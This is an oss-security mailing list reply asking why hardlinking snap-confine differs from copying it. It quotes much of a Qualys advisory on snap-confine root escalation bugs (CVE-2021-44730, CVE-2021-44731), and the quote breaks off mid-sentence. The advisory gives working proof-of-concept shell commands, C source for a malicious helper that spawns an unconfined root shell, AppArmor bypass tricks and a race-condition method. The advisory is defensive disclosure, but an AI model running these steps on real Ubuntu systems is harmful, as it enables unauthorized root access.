oss-security - Re: CVE-2021-44731: Race condition in snap-confine's setup_private

Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Mw_ZpdC--3-2@tuta.io>
Date: Wed, 23 Feb 2022 08:54:49 +0100 (CET)
From: Wire Snark <wsnark@...a.io>
To: Oss Security <oss-security@...ts.openwall.com>
Cc: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: CVE-2021-44731: Race condition in
 snap-confine's
 setup_private_mount()

Hello.

Can someone clarify CVE-2021-44730 dependency on hardlinking? This passage:

> Unfortunately, if we are able to hardlink snap-confine into a directory
> that we own, and if we execute this hardlink, then snap-confine will
> open our directory and execute our own, arbitrary snap-update-ns and
> snap-discard-ns programs, as root.
>
Why it isn't possible to copy the snap-confine binary into a directory for the same effect -- instead of hardlinking it? I cannot see how hardlink is different from a simple copy in this context.

Thanks!


Feb 17, 2022, 19:47 by qsa@...lys.com:

>
> Qualys Security Advisory
>
> Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
>
>
> ========================================================================
> Contents
> ========================================================================
>
> Summary
> Two minor bugs
> An unexploitable bug
> CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool()
> CVE-2021-44731: Race condition in snap-confine's setup_private_mount()
> - Case study: Ubuntu Server, near-default installation
> - Case study: Ubuntu Desktop, default installation
> CVE-2021-3996: Unauthorized unmount in util-linux's libmount
> CVE-2021-3995: Unauthorized unmount in util-linux's libmount
> CVE-2021-3998: Unexpected return value from glibc's realpath()
> CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
> CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles
> Acknowledgments
> Timeline
>
>
>  "Some of the new puzzles are superb and will have you scratching your
>  head for some time as you check out all the possible routes and find
>  most of them are red herrings."
>  -- John Sweeney (1992). "Oh No! More Lemmings". New Atari User (55).
>
>
> ========================================================================
> Summary
> ========================================================================
>
> We recently audited snap-confine (a SUID-root program that is installed
> by default on Ubuntu) and discovered two vulnerabilities (two Local
> Privilege Escalations, from any user to root): CVE-2021-44730 and
> CVE-2021-44731.
>
>  "Snap is a software packaging and deployment system developed by
>  Canonical for operating systems that use the Linux kernel. The
>  packages, called snaps, and the tool for using them, snapd, work
>  across a range of Linux distributions and allow upstream software
>  developers to distribute their applications directly to users. Snaps
>  are self-contained applications running in a sandbox with mediated
>  access to the host system." (Wikipedia)
>
>  "snap-confine is a program used internally by snapd to construct the
>  execution environment for snap applications." (man snap-confine)
>
> Discovering and exploiting a vulnerability in snap-confine has been
> extremely challenging (especially in a default installation of Ubuntu),
> because snap-confine uses a very defensive programming style, AppArmor
> profiles, seccomp filters, mount namespaces, and two Go helper programs.
> Eventually, we discovered two vulnerabilities:
>
> - CVE-2021-44730, a hardlink attack that is exploitable in a non-default
>  configuration only (when the kernel's fs.protected_hardlinks is 0);
>
> - CVE-2021-44731, a race condition that is exploitable in default
>  installations of Ubuntu Desktop, and near-default installations of
>  Ubuntu Server (the default installation, plus one of the "Featured
>  Server Snaps" that are offered during the installation; for example,
>  "heroku" or "microk8s").
>
> While working on snap-confine, we also discovered several
> vulnerabilities in related packages and libraries: CVE-2021-3996 and
> CVE-2021-3995 in util-linux (libmount and umount), CVE-2021-3998 and
> CVE-2021-3999 in the glibc (realpath() and getcwd()), and CVE-2021-3997
> in systemd (systemd-tmpfiles). We partially published these secondary
> vulnerabilities in January 2022, shortly after their patches became
> available:
>
>  https://www.openwall.com/lists/oss-security/2022/01/10/2
>  https://www.openwall.com/lists/oss-security/2022/01/24/2
>  https://www.openwall.com/lists/oss-security/2022/01/24/4
>
> If you enjoy puzzle games like Lemmings (which turns 31 this year!),
> then we hope that you will enjoy this advisory.
>
>
>
> ========================================================================
> Two minor bugs
> ========================================================================
>
>  Don't let your eyes deceive you
>  -- Lemmings, Fun Level 15
>
> We almost abandoned our audit after a few days, because snap-confine is
> programmed very defensively, and it has been thoroughly reviewed before
> (by Matthias Gerstner of the SUSE Security Team):
>
>  https://www.openwall.com/lists/oss-security/2019/04/18/4
>  https://bugzilla.suse.com/show_bug.cgi?id=1127368
>
> Nevertheless, we decided to continue our audit because we spotted two
> minor bugs (probably typos) and began to suspect that nastier bugs might
> be hiding in snap-confine. Both minor bugs are located in the main()
> function:
>
> ------------------------------------------------------------------------
> 433         sc_identity real_user_identity = {
> 434                 .uid = real_uid,
> 435                 .gid = real_gid,
> 436                 .change_uid = 1,
> 437                 .change_gid = 1,
> 438         };
> 439         sc_set_effective_identity(real_user_identity);
> ...
> 466         if (getresuid(&real_uid, &effective_uid, &saved_uid) != 0) {
> 467                 die("getresuid failed");
> 468         }
> ...
> 494         // Permanently drop if not root
> 495         if (effective_uid == 0) {
> ...
> 498                 if (setgid(real_gid) != 0)
> 499                         die("setgid failed");
> 500                 if (setuid(real_uid) != 0)
> 501                         die("setuid failed");
> 502 
> 503                 if (real_gid != 0 && (getuid() == 0 || geteuid() == 0))
> 504                         die("permanently dropping privs did not work");
> 505                 if (real_uid != 0 && (getgid() == 0 || getegid() == 0))
> 506                         die("permanently dropping privs did not work");
> 507         }
> ...
> 542         execv(invocation.executable, (char *const *)&argv[0]);
> ------------------------------------------------------------------------
>
> The "real_gid" at line 503 should be "real_uid", and the "real_uid" at
> line 505 should be "real_gid". This first bug does not have dangerous
> consequences, because the lines 503-506 are basically defense-in-depth
> checks: the lines 498-501 have already checked that the root privileges
> were dropped successfully.
>
> Moreover, the second minor bug prevents snap-confine from actually
> entering the code block at lines 495-507: the effective_uid at line 495
> is in fact not 0 anymore, because the effective uid was set to the real,
> unprivileged uid at lines 433-439, and the effective_uid variable was
> set to this unprivileged uid at lines 466-468.
>
> This second bug may seem serious at first glance, because it prevents
> snap-confine from calling the privilege-dropping functions setuid() and
> setgid() (at lines 498-501) before a user-controlled program is executed
> (at line 542). In reality this does not have dangerous consequences: the
> only remaining privileged uid (the saved uid) is automatically reset to
> the effective, unprivileged uid by the execve() syscall (at line 542).
>
> Despite their practical uselessness, these two minor bugs motivated us
> to continue our audit, and we are deeply grateful to them.
>
>
>
> ========================================================================
> An unexploitable bug
> ========================================================================
>
>  DON'T PANIC
>  -- Oh No! More Lemmings, Crazy Level 19
>
> We also discovered a minor bug in the sc_call_snap_update_ns_as_user()
> function:
>
> ------------------------------------------------------------------------
> 112         const char *xdg_runtime_dir = getenv("XDG_RUNTIME_DIR");
> 113         char xdg_runtime_dir_env[PATH_MAX + strlen("XDG_RUNTIME_DIR=")];
> 114         if (xdg_runtime_dir != NULL) {
> 115                 sc_must_snprintf(xdg_runtime_dir_env,
> 116                                  sizeof(xdg_runtime_dir_env),
> 117                                  "XDG_RUNTIME_DIR=%s", xdg_runtime_dir);
> 118         }
> ...
> 127         char *envp[] = {
> ...
> 132                 xdg_runtime_dir_env, NULL
> 133         };
> 134         sc_call_snapd_tool_with_apparmor(snap_update_ns_fd,
> 135                                          "snap-update-ns", apparmor,
> 136                                          aa_profile, argv, envp);
> ------------------------------------------------------------------------
>
> If we execute snap-confine without an XDG_RUNTIME_DIR environment
> variable, then the stack-based buffer xdg_runtime_dir_env[] is not
> initialized (lines 112-118), and the uninitialized contents of this
> buffer are passed as an environment variable to snap-update-ns (lines
> 127-136), a helper program that is executed with root privileges.
>
> This bug may also seem serious at first glance (because we may be able
> to control the contents of this uninitialized buffer), but we do not
> believe that it is exploitable:
>
> - snap-update-ns is a statically-linked Go program, and therefore does
>  not process most of the "unsecure" environment variables (LD_PRELOAD,
>  LD_AUDIT, etc);
>
> - snap-update-ns is executed with effective uid 0 but unprivileged real
>  uid (like a SUID-root program), and therefore runs in "secure" mode
>  (__libc_enable_secure);
>
> - snap-update-ns calls clearenv() in its bootstrap function, and thereby
>  erases all environment variables (another layer of defense in depth).
>
> More importantly, the size of sc_call_snap_update_ns_as_user()'s stack
> frame (which contains the uninitialized buffer xdg_runtime_dir_env[]) is
> ~8KB, but the stack-frame size of sc_do_mount() (which is called before
> sc_call_snap_update_ns_as_user()) is ~10KB and is filled with zeros. In
> other words, xdg_runtime_dir_env[] is indirectly filled with zeros (by
> sc_do_mount()) and we cannot pass an arbitrary environment variable to
> snap-update-ns (just an empty environment variable).
>
>
>
> ========================================================================
> CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool()
> ========================================================================
>
>  Easy when you know how
>  -- Lemmings, Fun Level 17
>
> snap-confine dynamically obtains the path to snap-update-ns and
> snap-discard-ns (two helper programs that are executed with root
> privileges) by reading its own path via /proc/self/exe (at line 166), by
> opening this path's directory (at line 174), and by opening the helper
> program inside this directory (at line 179) -- this helper program is
> later executed via fexecve():
>
> ------------------------------------------------------------------------
>  69 int sc_open_snap_update_ns(void)
>  70 {
>  71         return sc_open_snapd_tool("snap-update-ns");
>  72 }
> ------------------------------------------------------------------------
> 139 int sc_open_snap_discard_ns(void)
> 140 {
> 141         return sc_open_snapd_tool("snap-discard-ns");
> 142 }
> ------------------------------------------------------------------------
> 160 static int sc_open_snapd_tool(const char *tool_name)
> 161 {
> ...
> 166         if (readlink("/proc/self/exe", buf, sizeof buf) < 0) {
> ...
> 172         char *dir_name = dirname(buf);
> ...
> 174         dir_fd = open(dir_name, O_PATH | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
> ...
> 179         tool_fd = openat(dir_fd, tool_name, O_PATH | O_NOFOLLOW | O_CLOEXEC);
> ...
> 184         return tool_fd;
> 185 }
> ------------------------------------------------------------------------
>
> Unfortunately, if we are able to hardlink snap-confine into a directory
> that we own, and if we execute this hardlink, then snap-confine will
> open our directory and execute our own, arbitrary snap-update-ns and
> snap-discard-ns programs, as root.
>
> Important note: this is impossible in a default configuration (although
> the kernel's fs.protected_hardlinks is 0 by default, the distributions
> set this sysctl to 1 by default). Consequently, in the following proof
> of concept, we exploit a default installation of Ubuntu Server whose
> fs.protected_hardlinks sysctl has been manually reset to 0.
>
> ________________________________________________________________________
>
> First, failed attempt
> ________________________________________________________________________
>
> First, as an unprivileged user, we make sure that the "lxd" snap (the
> only snap installed by default on Ubuntu Server) has been started
> (although it should have been started automatically at boot time):
>
> ------------------------------------------------------------------------
> $ id
> uid=1001(jane) gid=1001(jane) groups=1001(jane)
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent
> ...
> ------------------------------------------------------------------------
>
> Next, we hardlink snap-confine into a directory in /tmp, and (in the
> same directory) we create a simple snap-discard-ns program that should
> eventually be executed as root:
>
> ------------------------------------------------------------------------
> $ mkdir -m 0700 /tmp/.tmp
> $ cd /tmp/.tmp
> $ ln -i /usr/lib/snapd/snap-confine ./
> $ cp -i "$(which true)" snap-update-ns
>
> $ cat > snap-discard-ns.c << "EOF"
> #include <sys/types.h>
> #include <unistd.h>
>
> int main(void) {
>  if (setuid(0)) _exit(__LINE__);
>  if (setgid(0)) _exit(__LINE__);
>
>  char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL };
>  execve(*argv, argv, NULL);
>  _exit(__LINE__);
> }
> EOF
> $ gcc -o snap-discard-ns snap-discard-ns.c
> ------------------------------------------------------------------------
>
> Last, we execute our hardlinked snap-confine with a different base
> ("snapd" instead of "core18"), which forces snap-confine to restart the
> "lxd" snap and therefore to execute our own snap-discard-ns program:
>
> ------------------------------------------------------------------------
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> DEBUG: apparmor label on snap-confine is: unconfined
> DEBUG: apparmor mode is: (null)
> snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks
> ------------------------------------------------------------------------
>
> This first attempt failed: snap-confine exited because it detected that
> it was "unconfined" -- it is normally confined by an AppArmor profile
> named "/usr/lib/snapd/snap-confine", which was not applied here because
> we executed /tmp/.tmp/snap-confine, not /usr/lib/snapd/snap-confine.
>
> ________________________________________________________________________
>
> Second, failed attempt
> ________________________________________________________________________
>
> To solve this first problem, we force snap-confine's AppArmor profile on
> /tmp/.tmp/snap-confine, by wrapping its execution in aa-exec (a tool for
> confining a program with an AppArmor profile):
>
> ------------------------------------------------------------------------
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> cannot execute snapd tool snap-discard-ns: Permission denied
> snap-discard-ns failed with code 1
> ------------------------------------------------------------------------
>
> This second attempt also failed, because snap-confine's AppArmor profile
> denied the execution of our snap-discard-ns program in /tmp:
>
> ------------------------------------------------------------------------
> # dmesg | tail -n 1
> [16732.767948] audit: type=1400 audit(1635093756.584:30): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/tmp/.tmp/snap-discard-ns" pid=1777 comm="snap-confine" requested_mask="x" denied_mask="x" fsuid=0 ouid=1001
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Third, failed attempt
> ________________________________________________________________________
>
> To solve this second problem, we reviewed snap-confine's AppArmor
> profile (in /etc/apparmor.d/usr.lib.snapd.snap-confine.real) and noticed
> that it allows the execution of programs in ~/.Private:
>
>  @{HOME}/.Private/** mrixwlk,
>
> We therefore move our /tmp/.tmp directory to ~/.Private, and make
> another attempt:
>
> ------------------------------------------------------------------------
> $ mkdir -m 0700 ~/.Private
> $ cd ~/.Private
> $ mv -i /tmp/.tmp ./
> $ cd .tmp
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> snap-discard-ns failed with code 10
> ------------------------------------------------------------------------
>
> This third attempt succeeded in executing our snap-discard-ns program,
> but failed to subsequently execute /bin/bash (again because of
> snap-confine's AppArmor profile):
>
> ------------------------------------------------------------------------
> # dmesg | tail -n 1
> [16991.232201] audit: type=1400 audit(1635094015.048:31): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/usr/bin/bash" pid=1789 comm="6" requested_mask="x" denied_mask="x" fsuid=0 ouid=0
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Fourth, partially successful attempt
> ________________________________________________________________________
>
> To solve this third problem, we noticed that snap-confine's AppArmor
> profile allows the transition to AppArmor profiles that are not
> "unconfined" and that do not start with '/':
>
>  change_profile unsafe /** -> [^u/]**,
>
> and we also noticed that one of the "lxd" snap's AppArmor profiles
> ("snap.lxd.daemon" in /var/lib/snapd/apparmor/profiles/snap.lxd.daemon)
> is more permissive than snap-confine's profile. We therefore modify our
> snap-discard-ns program, to transition to the "snap.lxd.daemon" profile
> when executing /bin/bash (by writing "exec snap.lxd.daemon" to the file
> /proc/self/attr/exec, which is what "aa-exec -p snap.lxd.daemon" does):
>
> ------------------------------------------------------------------------
> $ cat > snap-discard-ns.c << "EOF"
> #include <sys/types.h>
> #include <unistd.h>
> #include <stdio.h>
>
> int main(void) {
>  if (setuid(0)) _exit(__LINE__);
>  if (setgid(0)) _exit(__LINE__);
>
>  FILE * const fp = fopen("/proc/self/attr/exec", "w");
>  if (!fp) _exit(__LINE__);
>  if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__);
>  if (fclose(fp)) _exit(__LINE__);
>
>  char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL };
>  execve(*argv, argv, NULL);
>  _exit(__LINE__);
> }
> EOF
> $ gcc -o snap-discard-ns snap-discard-ns.c
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> uid=0(root) gid=0(root) groups=0(root),1001(jane)
> snap.lxd.daemon (enforce)
> ...
> ------------------------------------------------------------------------
>
> This fourth attempt succeeded in executing /bin/bash and id, but this
> root shell is still confined ("snap.lxd.daemon (enforce)") and we would
> rather obtain an unconfined root shell.
>
> ________________________________________________________________________
>
> Fifth, successful attempt
> ________________________________________________________________________
>
> To solve this fourth and last problem, we noticed that the AppArmor
> profile "snap.lxd.daemon" allows the unconfined execution of aa-exec:
>
>  /{,usr/}{,s}bin/aa-exec ux,
>
> We therefore modify our snap-discard-ns program, to wrap the execution
> of our shell commands in "aa-exec -p unconfined":
>
> ------------------------------------------------------------------------
> $ cat > snap-discard-ns.c << "EOF"
> #include <sys/types.h>
> #include <unistd.h>
> #include <stdio.h>
>
> int main(void) {
>  if (setuid(0)) _exit(__LINE__);
>  if (setgid(0)) _exit(__LINE__);
>
>  FILE * const fp = fopen("/proc/self/attr/exec", "w");
>  if (!fp) _exit(__LINE__);
>  if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__);
>  if (fclose(fp)) _exit(__LINE__);
>
>  char * const argv[] = { "/bin/bash", "-c", "exec aa-exec -p unconfined -- "
>  "/bin/bash -c 'id; cat /proc/self/attr/current'", NULL };
>  execve(*argv, argv, NULL);
>  _exit(__LINE__);
> }
> EOF
> $ gcc -o snap-discard-ns snap-discard-ns.c
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> uid=0(root) gid=0(root) groups=0(root),1001(jane)
> unconfined
> ...
> ------------------------------------------------------------------------
>
> Finally, this fifth attempt successfully executed an unconfined root
> shell.
>
> Although we consider this attack impractical (because the sysctl
> fs.protected_hardlinks is 1 by default), it gave us the idea that
> eventually allowed us to exploit snap-confine in a default installation:
> what if we were able to create a copy of the SUID-root snap-confine in a
> writable directory like /tmp, but without creating a hardlink? We were
> particularly curious about bind-mounts, because snap-confine makes
> extensive use of bind-mounts to set up its sandboxes.
>
>
>
> ========================================================================
> CVE-2021-44731: Race condition in snap-confine's setup_private_mount()
> ========================================================================
>
>  It's all a matter of timing
>  -- Oh No! More Lemmings, Havoc Level 12
>
> To set up a snap's sandbox (more precisely, its mount namespace),
> snap-confine's function setup_private_mount() creates a temporary
> directory /tmp/snap.$SNAP_NAME/tmp (for example, /tmp/snap.lxd/tmp) --
> or reuses it if it already exists -- and bind-mounts it onto the /tmp
> directory inside the snap's mount namespace. setup_private_mount() is
> programmed very defensively (f*() and *at() syscalls, O_DIRECTORY and
> O_NOFOLLOW flags) to avoid race conditions:
>
> ------------------------------------------------------------------------
>  56 static void setup_private_mount(const char *snap_name)
>  57 {
>  ..
>  83         sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
>  84         sc_must_snprintf(tmp_dir, sizeof(tmp_dir), "%s/tmp", base_dir);
>  ..
>  91         if (mkdir(base_dir, 0700) < 0 && errno != EEXIST) {
>  ..
>  94         base_dir_fd = open(base_dir,
>  95                            O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
> ...
> 106         if (fchmod(base_dir_fd, 0700) < 0) {
> ...
> 109         if (fchown(base_dir_fd, 0, 0) < 0) {
> ...
> 114         if (mkdirat(base_dir_fd, "tmp", 01777) < 0 && errno != EEXIST) {
> ...
> 118         tmp_dir_fd = openat(base_dir_fd, "tmp",
> 119                             O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
> ...
> 123         if (fchmod(tmp_dir_fd, 01777) < 0) {
> ...
> 127         if (fchown(tmp_dir_fd, 0, 0) < 0) {
> ...
> 131         sc_do_mount(tmp_dir, "/tmp", NULL, MS_BIND, NULL);
> 132         sc_do_mount("none", "/tmp", NULL, MS_PRIVATE, NULL);
> 133 }
> ------------------------------------------------------------------------
>
> Unfortunately, this function is vulnerable to a race condition, because
> the line 131 passes an absolute path (/tmp/snap.lxd/tmp) to the mount()
> syscall, which does follow symlinks:
>
> - we create the directory /tmp/snap.lxd, before we execute snap-confine;
>
> - after the open() at line 94 but before the fchown() at line 109, we
>  replace /tmp/snap.lxd with another directory that contains a symlink
>  named "tmp" (which therefore becomes /tmp/snap.lxd/tmp) that points to
>  an arbitrary directory;
>
> - as a result, because the mount() at line 131 follows symlinks, we
>  trick snap-confine into bind-mounting an arbitrary directory onto /tmp
>  inside the snap's mount namespace.
>
> This race condition opens up a world of possibilities: inside the snap's
> mount namespace (which we can enter through snap-confine itself), we can
> bind-mount a world-writable, non-sticky directory onto /tmp, or we can
> bind-mount any other part of the filesystem onto /tmp. We will exploit
> this powerful primitive in the two following case studies.
>
> Note: we can reliably win this race condition, by monitoring
> /tmp/snap.lxd with inotify, by pinning our exploit and snap-confine to
> the same CPU with sched_setaffinity(), and by lowering snap-confine's
> scheduling priority with setpriority() and sched_setscheduler().
>
>
>
> ========================================================================
> Case study: Ubuntu Server, near-default installation
> ========================================================================
>
>  Not as complicated as it looks
>  -- Lemmings, Fun Level 8
>
> In this first case study, we exploit a default installation of Ubuntu
> Server, plus one of the "Featured Server Snaps" that are offered during
> the installation; we abuse the snap "heroku" here, but other snaps can
> be abused instead (for example, "microk8s").
>
> Our main idea is to exploit CVE-2021-44731, bind-mount the directory
> /usr/lib/snapd (which contains snap-confine) onto /tmp inside the snap's
> mount namespace, and reproduce our exploit for CVE-2021-44730 (without a
> hardlink): we execute /tmp/snap-confine (inside the snap's mount
> namespace), and force it to execute our own /tmp/snap-discard-ns
> program, as root.
>
> In theory, this seems impossible: if we bind-mount /usr/lib/snapd onto
> /tmp, then /tmp/snap-discard-ns will always be the real snap-discard-ns,
> not our own program. In practice, when snap-confine is executed inside a
> mount namespace, it first calls sc_reassociate_with_pid1_mount_ns(),
> which enters init's mount namespace, where /tmp is not bind-mounted:
> snap-confine executes /tmp/snap-discard-ns outside the snap's mount
> namespace, where we can create our own programs in /tmp.
>
> ________________________________________________________________________
>
> First, failed attempt
> ________________________________________________________________________
>
> In this first version of our exploit, we create an empty directory
> /tmp/snap.heroku and a directory /tmp/snap.XXXXXX that contains a "tmp"
> symlink to /usr/lib/snapd, and we exchange these two directories at the
> right time, to bind-mount /usr/lib/snapd onto /tmp inside heroku's mount
> namespace. The command we execute is "/usr/lib/snapd/snap-confine --base
> core snap.heroku.heroku /bin/bash -c 'sleep 10; /tmp/snap-confine --base
> snapd snap.heroku.heroku /nonexistent'".
>
> Note: if the "core" base is not installed, we can use the "core18" base
> instead, but then we must bind-mount /snap/snapd/current/usr/lib/snapd
> instead of /usr/lib/snapd (for glibc compatibility reasons).
>
> ------------------------------------------------------------------------
> $ id
> uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
>
> $ cd /tmp
> $ cp -i "$(which true)" snap-update-ns
> $ gcc -o snap-discard-ns snap-discard-ns.c
>
> $ gcc -o CVE-2021-44731-Server1 CVE-2021-44731-Server1.c
> $ ./CVE-2021-44731-Server1
> ...
> DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
> DEBUG: apparmor mode is: enforce
> ...
> cannot chmod base directory /tmp/snap.heroku to 0700: Operation not permitted
> ------------------------------------------------------------------------
>
> This first attempt failed, because snap-confine's AppArmor profile
> prevented setup_private_mount() from fchmod()ing our /tmp/snap.heroku
> directory (at line 106):
>
> ------------------------------------------------------------------------
> # dmesg | tail -n 1
> [26963.479502] audit: type=1400 audit(1635180724.155:37): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=1712 comm="snap-confine" capability=3  capname="fowner"
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Second, failed attempt
> ________________________________________________________________________
>
> To solve this first, seemingly insurmountable problem, we tried out a
> Crazy! Wild! Wicked! idea -- to execute snap-confine in "unconfined"
> mode, by wrapping it in "aa-exec -p unconfined":
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-44731-Server2 CVE-2021-44731-Server2.c
> $ ./CVE-2021-44731-Server2
> ...
> DEBUG: apparmor label on snap-confine is: unconfined
> DEBUG: apparmor mode is: (null)
> snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks
> ------------------------------------------------------------------------
>
> Incredibly, this idea worked out; however, snap-confine's defensive
> programming detected this unconfined execution and called exit().
>
> ________________________________________________________________________
>
> Third, successful attempt
> ________________________________________________________________________
>
> Since snap-confine refuses to run unconfined, but accepts AppArmor
> profiles other than the intended "/usr/lib/snapd/snap-confine" profile,
> we reviewed all AppArmor profiles and noticed that some of them are in
> "complain" mode (for example, "snap.heroku.heroku"):
>
> ------------------------------------------------------------------------
> # aa-status
> apparmor module is loaded.
> 35 profiles are loaded.
> 33 profiles are in enforce mode.
>  ...
> 2 profiles are in complain mode.
>  snap.heroku.heroku
>  ...
> ------------------------------------------------------------------------
>
> These "complain" profiles log policy violations but allow the offending
> program to continue its execution (unlike "kill" or "enforce" profiles);
> we therefore try to wrap snap-confine in "aa-exec -p snap.heroku.heroku"
> to bypass AppArmor:
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-44731-Server3 CVE-2021-44731-Server3.c
> $ ./CVE-2021-44731-Server3
> ...
> DEBUG: apparmor label on snap-confine is: snap.heroku.heroku
> DEBUG: apparmor mode is: complain
> ...
> DEBUG: execv(/bin/bash, /bin/bash...)
> DEBUG:  argv[1] = -c
> DEBUG:  argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.heroku.heroku /nonexistent
> ...
> DEBUG: moving to mount namespace of pid 1
> ...
> DEBUG: calling snapd tool snap-discard-ns
> ...
> uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
> snap.heroku.heroku (complain)
> ...
> ------------------------------------------------------------------------
>
> This third attempt successfully executed a root shell that is
> effectively unconfined ("snap.heroku.heroku (complain)").
>
> Side note: we tried and failed to exploit CVE-2021-44731 in a default
> installation of Ubuntu Server (i.e., without an extra snap like "heroku"
> or "microk8s"); we faced two problems:
>
> - The "lxd" snap (the only snap installed by default on Ubuntu Server)
>  is started automatically at boot time by snapd; this prevents us from
>  creating /tmp/snap.lxd ourselves. The solution to this first problem
>  is surprisingly easy, because the cron daemon is started before snapd
>  at boot time: we can add an "@reboot touch /tmp/snap.lxd" command to
>  our user's crontab and take ownership of this directory before snapd
>  (on the next reboot).
>
> - No AppArmor profiles are in "complain" mode by default; this prevents
>  us from bypassing AppArmor (the fchmod() at line 106). Interestingly,
>  the check that prevents snap-confine from running unconfined is very
>  fragile (a fail-open check): if aa_is_enabled() fails (if it returns
>  false), then snap-confine assumes that AppArmor is disabled, and
>  allows us to run it unconfined.
>
>  Internally, aa_is_enabled() calls the glibc's setmntent() (fopen()),
>  getmntent() (malloc() and fgets()), and endmntent(); for example, if
>  we set a low RLIMIT_NOFILE resource limit, then this fopen() fails,
>  and snap-confine continues to run unconfined:
>
> ------------------------------------------------------------------------
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd prlimit --nofile=4 aa-exec -p unconfined -- /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent
> ...
> DEBUG: apparmor is not enabled: Too many open files
> cannot open path /proc/1/ns/mnt: Too many open files
> ------------------------------------------------------------------------
>
>  However, this RLIMIT_NOFILE resource limit is so low that subsequent
>  open()s also fail and prevent snap-confine from running normally. We
>  also tried to reach the system-wide limit on open files (fs.file-max)
>  but failed, because systemd increases this limit to LONG_MAX (since
>  version 240). We also tried to cause a failure in setmntent() or
>  getmntent() by lowering the RLIMIT_DATA resource limit, but also
>  failed.
>
>  If you, dear reader, find a solution to this second problem, please
>  post it to the public oss-security mailing list!
>
>
>
> ========================================================================
> Case study: Ubuntu Desktop, default installation
> ========================================================================
>
>  If at first you don't succeed..
>  -- Lemmings, Taxing Level 1
>
> To exploit CVE-2021-44731 in a default installation of Ubuntu Desktop,
> we execute snap-confine with the "snap-store" snap (the only snap that
> is installed by default) and we bypass AppArmor with one of the default
> "complain" profiles (for example, "libreoffice-soffice").
>
> Still, inside its sandbox, snap-confine applies one of snap-store's
> "enforce" profiles (for example, "snap.snap-store.snap-store"), which
> prevents us from successfully executing /tmp/snap-confine and therefore
> prevents us from reusing our Ubuntu-Server exploitation technique:
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-44731-Desktop0 CVE-2021-44731-Desktop0.c
> $ ./CVE-2021-44731-Desktop0
> ...
> DEBUG: apparmor label on snap-confine is: libreoffice-soffice
> DEBUG: apparmor mode is: complain
> ...
> DEBUG: execv(/bin/bash, /bin/bash...)
> DEBUG:  argv[1] = -c
> DEBUG:  argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.snap-store.snap-store /nonexistent
> ...
> DEBUG: apparmor is available but the interface but the interface is not available
> cannot read mount namespace identifier of pid 1: Permission denied
> ------------------------------------------------------------------------
>
> Belatedly, we realized that the setup of snap-store's mount namespace is
> extremely complicated; indeed, snap-confine executes the helper program
> snap-update-ns twice:
>
> - a first time, to set up the "system" bind-mounts listed in
>  /var/lib/snapd/mount/snap.snap-store.fstab;
>
> - a second time, to set up the "user" bind-mounts listed in
>  /var/lib/snapd/mount/snap.snap-store.user-fstab.
>
> Among those system bind-mounts, one in particular caught our attention:
>
>  /var/lib/snapd/hostfs/var/lib/app-info /var/lib/app-info none bind,ro 0 0
>
> To set up this bind-mount, snap-update-ns must first create the
> directory /var/lib/app-info; but inside snap-store's mount namespace,
> /var/lib is in a read-only filesystem (the "core18" base's squashfs).
> Consequently, snap-update-ns must first create a "mimic" -- a writable
> copy of /var/lib:
>
> 1/ it bind-mounts /var/lib onto /tmp/.snap/var/lib (inside snap-store's
> mount namespace);
>
> 2/ it mounts a tmpfs onto /var/lib;
>
> 3/ it bind-mounts every directory entry from /tmp/.snap/var/lib back
> into /var/lib;
>
> 4/ it creates the directory /var/lib/app-info (which is in a writable
